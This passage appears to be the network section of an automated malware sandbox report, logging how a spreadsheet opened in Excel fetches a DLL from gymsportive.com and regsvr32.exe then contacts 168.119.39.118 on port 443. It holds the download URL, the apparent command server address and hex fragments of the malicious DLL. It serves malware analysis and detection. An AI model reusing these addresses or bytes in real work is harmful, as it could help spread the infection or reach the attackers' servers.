Mar 2, 2022 16:18:46.166172028 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:46.277112961 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:46.277163029 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:46.277198076 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:46.277215958 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:46.277241945 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:46.277246952 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:46.435528040 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:46.435570002 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:46.435590029 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:46.435615063 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:46.435638905 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:46.435661077 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:46.435683966 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:46.435774088 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:46.435801983 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:46.512658119 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:46.512691021 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:46.512711048 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:46.512722969 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:46.512736082 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:46.512846947 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:46.516863108 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:51.152791023 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:51.152949095 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:52.997467041 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:52.997502089 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:52.997520924 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:52.997534037 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:52.997546911 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:52.997560024 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:52.997579098 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:52.997589111 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:52.997596025 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:52.997613907 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:52.997621059 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:52.997626066 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:52.997629881 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:52.997632027 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:52.997648954 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:52.997649908 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:52.997678995 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:52.997711897 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:52.998732090 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:53.010261059 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:53.010423899 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:53.010436058 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:53.010457993 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:53.010476112 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:53.010494947 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:53.010518074 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:53.010535002 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:53.010581970 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:53.192038059 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:53.192069054 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:53.192086935 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:53.192306995 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:53.219449997 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:53.219482899 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:53.219496012 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:53.219510078 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:53.219528913 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:53.219604015 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:53.219623089 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:53.219640017 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:53.219657898 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:53.219681025 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:53.219695091 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:53.219707966 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:53.219744921 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:53.219795942 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:53.219805002 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:53.219810963 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:53.219815969 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:53.220520020 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:53.234704018 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:53.234735012 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:53.234932899 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:53.381205082 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:53.381247997 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:53.381273985 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:53.381412029 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:53.515799046 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:53.515902996 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:53.515930891 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:53.515949965 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:53.515955925 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:53.515985012 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:53.515993118 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:53.515996933 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:53.516011000 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:53.516014099 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:53.516036987 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:53.516036987 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:53.516062021 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:53.516074896 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:53.578439951 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:53.578485012 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:53.578528881 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:53.578557014 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:53.578584909 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:53.578651905 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:53.578679085 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:58.447964907 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:58.448117971 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:59.685431004 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:59.685467958 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:59.685491085 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:59.685517073 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:59.685539007 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:59.685595036 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:59.685621977 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:59.700391054 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:59.700423956 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:59.700448036 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:59.700472116 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:59.700496912 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:59.700522900 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:59.700573921 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:59.700604916 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:59.717047930 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:59.717103004 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:59.717133045 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:59.717160940 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:59.717191935 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:59.717283964 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:59.717602968 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:59.879600048 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:59.879635096 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:59.879662991 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:59.879666090 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:59.879693985 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:59.879707098 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:59.885140896 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:59.885190010 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:59.885216951 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:59.885221958 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:18:59.885245085 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:18:59.885257959 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:19:49.270349026 CET	49169	443	192.168.2.22	168.119.39.118
Mar 2, 2022 16:19:49.270432949 CET	443	49169	168.119.39.118	192.168.2.22
Mar 2, 2022 16:19:49.270520926 CET	49169	443	192.168.2.22	168.119.39.118
Mar 2, 2022 16:19:49.361387014 CET	49169	443	192.168.2.22	168.119.39.118
Mar 2, 2022 16:19:49.361429930 CET	443	49169	168.119.39.118	192.168.2.22
Mar 2, 2022 16:19:49.449455023 CET	443	49169	168.119.39.118	192.168.2.22
Mar 2, 2022 16:19:49.449677944 CET	49169	443	192.168.2.22	168.119.39.118
Mar 2, 2022 16:19:49.471832037 CET	49169	443	192.168.2.22	168.119.39.118
Mar 2, 2022 16:19:49.471900940 CET	443	49169	168.119.39.118	192.168.2.22
Mar 2, 2022 16:19:49.472359896 CET	443	49169	168.119.39.118	192.168.2.22
Mar 2, 2022 16:19:49.472470045 CET	49169	443	192.168.2.22	168.119.39.118
Mar 2, 2022 16:19:50.032272100 CET	49169	443	192.168.2.22	168.119.39.118
Mar 2, 2022 16:19:50.073894978 CET	443	49169	168.119.39.118	192.168.2.22
Mar 2, 2022 16:19:51.220144033 CET	443	49169	168.119.39.118	192.168.2.22
Mar 2, 2022 16:19:51.220267057 CET	443	49169	168.119.39.118	192.168.2.22
Mar 2, 2022 16:19:51.220279932 CET	49169	443	192.168.2.22	168.119.39.118
Mar 2, 2022 16:19:51.220324039 CET	49169	443	192.168.2.22	168.119.39.118
Mar 2, 2022 16:19:51.222090960 CET	49169	443	192.168.2.22	168.119.39.118
Mar 2, 2022 16:19:51.222126961 CET	443	49169	168.119.39.118	192.168.2.22
Mar 2, 2022 16:20:45.267719030 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:20:46.369388103 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:20:46.369563103 CET	49167	80	192.168.2.22	212.64.200.154

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 2, 2022 16:16:54.874022007 CET	52167	53	192.168.2.22	8.8.8.8
Mar 2, 2022 16:16:54.890644073 CET	53	52167	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Mar 2, 2022 16:16:54.874022007 CET	192.168.2.22	8.8.8.8	0x7396	Standard query (0)	gymsportive.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Mar 2, 2022 16:16:54.890644073 CET	8.8.8.8	192.168.2.22	0x7396	No error (0)	gymsportive.com		212.64.200.154	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

168.119.39.118

gymsportive.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49169	168.119.39.118	443	C:\Windows\SysWOW64\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49167	212.64.200.154	80	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp	kBytes transferred	Direction	Data
Mar 2, 2022 16:16:54.964171886 CET	2	OUT	GET /0zwe/pSiUh/ HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: gymsportive.com Connection: Keep-Alive
Mar 2, 2022 16:16:55.262532949 CET	2	OUT	GET /0zwe/pSiUh/ HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: gymsportive.com Connection: Keep-Alive
Mar 2, 2022 16:16:55.871170998 CET	3	OUT	GET /0zwe/pSiUh/ HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: gymsportive.com Connection: Keep-Alive
Mar 2, 2022 16:16:57.087965012 CET	3	OUT	GET /0zwe/pSiUh/ HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: gymsportive.com Connection: Keep-Alive
Mar 2, 2022 16:16:58.305175066 CET	4	OUT	GET /0zwe/pSiUh/ HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: gymsportive.com Connection: Keep-Alive
Mar 2, 2022 16:16:59.506289005 CET	4	OUT	GET /0zwe/pSiUh/ HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: gymsportive.com Connection: Keep-Alive
Mar 2, 2022 16:17:00.289176941 CET	5	IN	HTTP/1.1 200 OK Cache-Control: no-cache, must-revalidate Pragma: no-cache Content-Type: application/x-msdownload Expires: Wed, 02 Mar 2022 15:18:34 GMT Last-Modified: Wed, 02 Mar 2022 15:18:34 GMT Server: Set-Cookie: 621f8aca6fba5=1646234314; expires=Wed, 02-Mar-2022 15:19:34 GMT; Max-Age=60; path=/ Content-Disposition: attachment; filename="uVyr9TJj.dll" Content-Transfer-Encoding: binary X-Powered-By-Plesk: PleskWin Date: Wed, 02 Mar 2022 15:18:33 GMT Content-Length: 1028096 Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 be 93 00 15 fa f2 6e 46 fa f2 6e 46 fa f2 6e 46 39 fd 31 46 f0 f2 6e 46 39 fd 33 46 ed f2 6e 46 fa f2 6f 46 da f0 6e 46 dd 34 13 46 e5 f2 6e 46 dd 34 03 46 76 f2 6e 46 dd 34 00 46 5b f2 6e 46 dd 34 14 46 fb f2 6e 46 dd 34 12 46 fb f2 6e 46 fa f2 6e 46 fb f2 6e 46 dd 34 16 46 fb f2 6e 46 52 69 63 68 fa f2 6e 46 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 1c 7e 1e 62 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 60 09 00 00 80 06 00 00 00 00 00 27 8e 04 00 00 10 00 00 00 70 09 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 f0 0f 00 00 10 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 7b 0b 00 ab 01 00 00 00 00 0c 00 f0 00 00 00 00 50 0c 00 c6 fe 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 0f 00 f4 8b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 77 0a 00 40 00 00 00 00 00 00 00 00 00 00 00 e4 0c 0c 00 f4 0b 00 00 00 40 0c 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 97 50 09 00 00 10 00 00 00 60 09 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 4b 0d 02 00 00 70 09 00 00 10 02 00 00 70 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 c8 7f 00 00 00 80 0b 00 00 40 00 00 00 80 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b3 3f 00 00 00 00 0c 00 00 40 00 00 00 c0 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 19 03 00 00 00 40 0c 00 00 10 00 00 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 c6 fe 02 00 00 50 0c 00 00 00 03 00 00 10 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 05 9f 00 00 00 50 0f 00 00 a0 00 00 00 10 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$nFnFnF91FnF93FnFoFnF4FnF4FvnF4F[nF4FnF4FnFnFnF4FnFRichnFPEL~b!`'p{PPw@@@.textP` `.rdataKpp@@.data@@.idata?@@.didat@@.rsrcP@@.relocP@B
Mar 2, 2022 16:17:00.289205074 CET	7	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Mar 2, 2022 16:17:00.289222956 CET	8	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Mar 2, 2022 16:17:00.289241076 CET	9	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Mar 2, 2022 16:17:00.289259911 CET	11	IN	Data Raw: 00 e9 fa 81 00 00 e9 22 0a 00 00 e9 80 6a 00 00 e9 48 09 00 00 e9 6d 1e 00 00 e9 96 0c 00 00 e9 a6 14 00 00 e9 a2 57 00 00 e9 08 09 00 00 e9 55 0b 00 00 e9 38 7a 00 00 e9 59 6a 00 00 e9 08 88 00 00 e9 30 82 00 00 e9 01 16 00 00 e9 96 1d 00 00 e9 Data Ascii: "jHmWU8zYj0nVYY,x44B$LTVy
Mar 2, 2022 16:17:00.289285898 CET	12	IN	Data Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii:
Mar 2, 2022 16:17:00.289594889 CET	14	IN	Data Raw: cc cc 6a 01 ff 71 20 ff 15 b0 15 0c 10 c3 cc cc cc 6a 04 b8 20 d7 08 10 e8 c5 58 04 00 8b f1 89 75 f0 c7 06 34 83 09 10 83 65 fc 00 8d 4e 78 c7 01 08 83 09 10 e8 51 b2 00 00 83 4d fc ff 8b ce e8 95 f3 ff ff e8 70 59 04 00 c3 cc cc cc cc cc cc cc Data Ascii: jq j Xu4eNxQMpY VPSY>u^ 1RYD$\|;BBhWAyfVt$QYuh
Mar 2, 2022 16:17:00.289618969 CET	15	IN	Data Raw: 57 ff 74 24 2c 56 ff 74 24 38 ff d5 8b f0 f7 de 1b f6 46 85 f6 74 05 e8 44 ed ff ff 5f 5e 5d 5b 59 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: Wt$,Vt$8FtD_^][YVL$uh@P^PVt$;~x~Va"@;};~;}P^jKS
Mar 2, 2022 16:17:00.289637089 CET	16	IN	Data Raw: cc cc cc cc cc cc cc 6a 10 b8 f3 d7 08 10 e8 c4 4e 04 00 8b 7d 08 33 c0 33 f6 3b fe 0f 95 c0 3b c6 75 0a 68 05 40 00 80 e8 f5 eb ff ff ff 15 80 b4 0b 10 89 45 e4 89 75 e8 3b fe 89 75 fc bb 00 04 00 00 74 51 57 ff 15 9c 11 0c 10 40 6a 02 50 89 45 Data Ascii: jN}33;;uh@Eu;utQW@jPEEP\|3u;VCYt%[VMTuVWPAVtV@jPEEP}34};WYtZWMuWVP
Mar 2, 2022 16:17:00.289654016 CET	18	IN	Data Raw: 10 e8 1b e5 ff ff 83 c4 0c 5d ff 25 04 80 0b 10 cc cc cc cc cc cc cc cc e9 be e4 ff ff 55 8b ec 83 7d 08 00 56 57 8b f9 75 0a 68 57 00 07 80 e8 b4 e6 ff ff ff 75 0c ff 75 08 e8 21 4f 04 00 59 59 8b f0 56 8b cf e8 90 e4 ff ff ff 75 0c 8d 4e 01 ff Data Ascii: ]%U}VWuhWuu!OYYVuNuQPQV_^]L$D$Pt$jHtPvJVPM'e+PPEhPr}WrJ
Mar 2, 2022 16:17:00.432679892 CET	19	IN	Data Raw: cc cc cc e8 a7 b0 01 00 0f b7 4c 24 04 8b 40 0c 51 50 ff 15 50 16 0c 10 c2 04 00 cc cc cc cc cc cc ff 74 24 04 6a 00 68 15 04 00 00 ff 71 20 ff 15 ac 15 0c 10 c2 04 00 cc cc cc cc cc 6a 00 ff 74 24 08 68 14 04 00 00 ff 71 20 ff 15 ac 15 0c 10 c2 Data Ascii: L$@QPPt$jhq jt$hq Vjjd/^D$t$P:@jVCuujfelfxFtN\|E9EHE
Mar 2, 2022 16:17:00.903191090 CET	21	IN	HTTP/1.1 200 OK Cache-Control: no-cache, must-revalidate Pragma: no-cache Content-Type: application/x-msdownload Expires: Wed, 02 Mar 2022 15:18:34 GMT Last-Modified: Wed, 02 Mar 2022 15:18:34 GMT Server: Set-Cookie: 621f8aca6fba5=1646234314; expires=Wed, 02-Mar-2022 15:19:34 GMT; Max-Age=60; path=/ Content-Disposition: attachment; filename="uVyr9TJj.dll" Content-Transfer-Encoding: binary X-Powered-By-Plesk: PleskWin Date: Wed, 02 Mar 2022 15:18:33 GMT Content-Length: 1028096 Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 be 93 00 15 fa f2 6e 46 fa f2 6e 46 fa f2 6e 46 39 fd 31 46 f0 f2 6e 46 39 fd 33 46 ed f2 6e 46 fa f2 6f 46 da f0 6e 46 dd 34 13 46 e5 f2 6e 46 dd 34 03 46 76 f2 6e 46 dd 34 00 46 5b f2 6e 46 dd 34 14 46 fb f2 6e 46 dd 34 12 46 fb f2 6e 46 fa f2 6e 46 fb f2 6e 46 dd 34 16 46 fb f2 6e 46 52 69 63 68 fa f2 6e 46 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 1c 7e 1e 62 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 60 09 00 00 80 06 00 00 00 00 00 27 8e 04 00 00 10 00 00 00 70 09 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 f0 0f 00 00 10 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 